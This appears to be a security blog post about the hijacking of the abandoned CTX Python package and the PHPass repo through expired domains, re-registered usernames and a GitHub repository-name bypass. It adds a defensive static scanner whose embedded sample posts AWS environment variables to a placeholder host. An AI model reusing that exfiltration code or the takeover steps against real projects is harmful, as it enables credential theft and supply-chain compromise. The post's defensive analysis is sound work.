When open-source developers walk away from maintaining their projects, it poses a high risk to all source code that depends on them. This is pretty much what happened with the CTX Python library.
This post includes a couple of indicators of compromise, which will help you understand how to catch these scenarios in the future.
Between September 2021 and May 2022, the Nordstrom-owned clothing brand HauteLook closed its GitHub account. It had been receding from the open-source community for some time.
In September 2021 they deleted their popular AliceBundle repo without a word.
On May 15th, 2022 the GitHub username HauteLook was registered again, this time by an interested third party.
This meant that the new owner of the GitHub account could act on behalf of the deleted account.
The open-source developer FigLeif (the name itself reads like a typosquat) had been inactive between July 2020 and May 2022. He had developed and maintained the CTX Python package, which gives Python developers the syntactic sugar of addressing data structure elements in attribute-access notation (i.e. foo.bar.baz) rather than the cumbersome item-access notation (i.e. foo["bar"]["baz"]); functionality which may seem frivolous to the uninitiated, but try typing all those brackets and quotes sometime - your pinkies will hate you for it ;-)
FigLeif's email domain expired in August 2021 but was re-registered by the same interested third party who took over the HauteLook account described above.
The same interested third party cleverly recreated the retired CTX repo and HauteLook's most prominent repo, a sadly named password hashing library, PHPass.
GitHub has a security control that prevents the creation of repository names equivalent to retired repository names, but the new owner of the FigLeif and HauteLook accounts found a bypass for it: change your username to something other than the previous owner of the repository, create a repository with the name of the retired repository, then change the username back to the previous owner's name.
Having done this, the interested party, a security researcher and college student named Yunus Aydin, blogged about the attack and posted it to his LinkedIn.
Yunus modified the packages so that every time they ran, the AWS environment variables were sent to a Heroku-hosted app he controlled.
This is dangerous because many applications, especially cloud hosted and containerized ones, store sensitive secrets in environment variables.
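The behaviour described above (a package that reads cloud credentials from the environment and also talks to the network) can be spotted statically. The following is an added example, not code from the original post or from the CTX project: it walks a module's AST and flags the combination of `os.environ`/`os.getenv` access with a networking import. The two embedded modules are constructed samples; the collector host name is a placeholder.

```python
import ast
from pathlib import Path

# Constructed sample modelled on the described behaviour: on use, it collects
# AWS_* variables and posts them to a remote host (placeholder name, not real).
SUSPICIOUS_SRC = '''
import os
import requests
class Ctx(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        leak = {k: v for k, v in os.environ.items() if k.startswith("AWS_")}
        requests.post("https://collector.example.invalid/hook", json=leak)
'''

# Constructed benign module: reads the environment but never imports networking.
BENIGN_SRC = '''
import os
DEBUG = os.environ.get("APP_DEBUG", "0") == "1"
'''

NETWORK_ROOTS = {"requests", "urllib", "http", "socket", "httpx"}
SECRET_HINTS = ("AWS_", "SECRET", "TOKEN", "PASSWORD")

def scan_source(src: str) -> dict:
    """Flag a module that both reads os.environ/os.getenv and imports a
    network library; also report string literals that look like secret names."""
    tree = ast.parse(src)
    net_imports = set()
    reads_env = False
    hints = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            net_imports |= {a.name for a in node.names
                            if a.name.split(".")[0] in NETWORK_ROOTS}
        elif isinstance(node, ast.ImportFrom) and node.module and node.module.split(".")[0] in NETWORK_ROOTS:
            net_imports.add(node.module)
        elif (isinstance(node, ast.Attribute) and node.attr in ("environ", "getenv")
              and isinstance(node.value, ast.Name) and node.value.id == "os"):
            reads_env = True
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.upper() for h in SECRET_HINTS):
                hints.append(node.value)
    return {"network_imports": sorted(net_imports), "reads_environment": reads_env,
            "secret_hints": hints, "flagged": reads_env and bool(net_imports)}

def scan_tree(root: Path) -> dict:
    """Scan every .py file under root (for example a site-packages directory)."""
    return {str(p): scan_source(p.read_text(encoding="utf-8")) for p in root.rglob("*.py")}
```

Point `scan_tree` at a site-packages directory to triage an installed environment; a `flagged` result is a prompt for manual review, not proof of compromise, since legitimate SDKs also read credentials and use the network.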
Since Yunus had taken over FigLeif's domain, he was able to reset the PyPI password, and then uploaded the malicious package to PyPI on May 14.
The security researcher Somdev found additional instances of the same by running a GitHub search. Thank you!
All open-source software needs a succession plan for when its maintainers move on. Building a successful, stable, useful library is surprisingly thankless. Both PHPass and CTX hadn't been touched in years and hadn't needed it. Their developers can't be blamed for losing interest.